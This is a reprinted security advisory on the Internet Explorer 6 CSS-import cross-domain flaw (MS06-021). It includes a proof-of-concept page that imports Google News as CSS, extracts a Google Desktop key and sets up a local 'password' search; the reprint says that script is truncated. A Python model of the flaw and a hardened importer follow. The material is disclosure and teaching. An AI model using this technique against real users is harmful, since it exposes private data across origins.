Microsoft Internet Explorer CSS Import Cross-Domain Restriction Bypass…

2008-04-09 04:14:41 Source: Internet


Microsoft Internet Explorer CSS Import Cross-Domain Restriction Bypass Vulnerability (MS06-021)

Published: 2005-12-01
Updated: 2006-06-13

Affected systems:
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

Description:
BUGTRAQ ID: 15660
CVE(CAN) ID: CVE-2005-4089

Microsoft Internet Explorer is Microsoft's widely used web browser.

Internet Explorer has a vulnerability in the way it handles CSS files; a remote attacker could exploit it to obtain sensitive user information.

Internet Explorer does not parse CSS files correctly and will import a file that is not valid CSS. As a result, a user can be made to import HTML and script code from a remote site as though it were a CSS file, allowing an attacker to read sensitive information.

<*Source: Matan Gillon (matan@hacker.co.il)

Links: http://www.hacker.co.il/security/ie/css_import.html
http://secunia.com/advisories/17564/print/
http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided only for security research and teaching purposes. Users assume all risk!

<html>
<head>

<!--
Google Desktop Exploit proof of concept by Matan Gillon

This page is a proof of concept for the CSSXSS attack discussed
at:
http://www.hacker.co.il/security/ie/css_import.html

It shows how using a few simple CSS imports an attacker can
run queries and return the results on a machine that has Google Desktop
v2 installed. This exploit runs only on IE or IE derived browsers.

This is how it's done in a nutshell:
1) Import the google news page as CSS with the query "}{".
2) Extract the GDS key from the import results using a regular expression.
3) Run another CSS import that executes a query for the word "password"
on the local GDS server.
4) Wait 5 seconds for the page to load and show the result.

This proof of concept code is supplied for educational purposes only.
-->

<title>hacker.co.il - Google Desktop Exploit</title>

<style type="text/css">
/*
Import the google news page, the GDS link with the secret key should be
retrieved by this. The query injects curly braces characters so the
link will be visible after the IE CSS parsing.
*/

@import url("http://news.google.com/news?hl=en&ned=us&q=}{");

</style>

</head>

<body>

<h2>Google Desktop Exploit proof of concept</h2>

<p>
Mangled HTML code returned from Google News by a CSS import (note the 127.0.0.1 desktop link):<br>
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>

<p>
Google Desktop key parsed from the code above:<br>

<input type="text" size="50" id="gdskey">

<p>
Results returned from local Google Desktop for the word "password" in raw HTML after CSS parsing:<br>
<textarea rows="20" cols="80" id="gdsresult">Please wait while getting results</textarea>

<p>
The original Google Desktop result page from the local machine:<br>

<iframe width="620" height="300" id="gdspage"></iframe>

<p>
<a href="http://www.hacker.co.il/security/ie/css_import.html">Back to article at hacker.co.il</a>

<script>

// This will show the results of the query on google desktop
// (IE-only: the styleSheets and imports collections are accessed with () syntax)
function showResults()
{
document.getElementById("gdsresult").innerText = document.styleSheets(0).imports(1).cssText;
}

// Show the CSS parsed HTML source of the Google News import
document.getElementById("gnewsssrc").innerText = document.styleSheets(0).imports(0).cssText;

// A regular expression that parses the key out of the CSS import result:
// the key sits between "search&s=" and "?q" in the 127.0.0.1:4664 link
var re = /127\.0\.0\.1:4664\/search&s=(.*?)\?q/;
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);

if (reRes)
{
// Show the parsed key
document.getElementById("gdskey").innerText = reRes[1];

// Combine the valid key with the local server address and add a password query to the URL
// (the script is truncated at this point in this reprint)
}

</script>

</body>
</html>
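The mechanism that the description and the PoC's first @import rely on, modelled in Python as an added example (not part of the advisory or of Gillon's PoC): a lenient importer that ignores the response's Content-Type and simply collects text between braces, so a reflected `}{` in the query string pushes the rest of the HTML, secret link included, into a "rule" body that script can read; beside it, the hardened importer that refuses a non-`text/css` cross-origin response, the check browsers apply today. The results page, the reflected query and the key value are constructed stand-ins, not real Google output.

```python
import re
from typing import Optional

# Constructed sample: a search-results page that reflects the query string and
# also carries a link with a per-user secret (stand-in for the Google Desktop
# key the PoC extracts). Not real Google News output.
def render_results_page(query: str) -> str:
    return (
        "<html><head><title>News</title></head><body>\n"
        f"<p>Results for: {query}</p>\n"
        '<a href="http://127.0.0.1:4664/search&s=SAMPLEKEY1234?q=">Desktop</a>\n'
        "</body></html>"
    )


def lenient_css_import(body: str, content_type: str) -> list[str]:
    """Simplified model of the vulnerable behaviour: the Content-Type is ignored,
    anything before a '{' is skipped as garbage, and text up to the next '}' (or
    end of input) becomes a rule body that would be exposed through cssText."""
    bodies = []
    i = 0
    while True:
        start = body.find("{", i)
        if start < 0:
            return bodies
        end = body.find("}", start + 1)
        if end < 0:
            bodies.append(body[start + 1:])   # unterminated block: rest of page leaks
            return bodies
        bodies.append(body[start + 1:end])
        i = end + 1


def strict_css_import(body: str, content_type: str) -> list[str]:
    """Hardened behaviour: a response is only treated as a stylesheet when it is
    served as text/css, so an HTML page never yields readable rule bodies."""
    if content_type.split(";")[0].strip().lower() != "text/css":
        return []
    return lenient_css_import(body, content_type)


# Same extraction the PoC performs: the key between "search&s=" and "?q".
KEY_RE = re.compile(r"127\.0\.0\.1:4664/search&s=(.*?)\?q")

def leaked_key(bodies: list[str]) -> Optional[str]:
    for b in bodies:
        m = KEY_RE.search(b)
        if m:
            return m.group(1)
    return None
```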
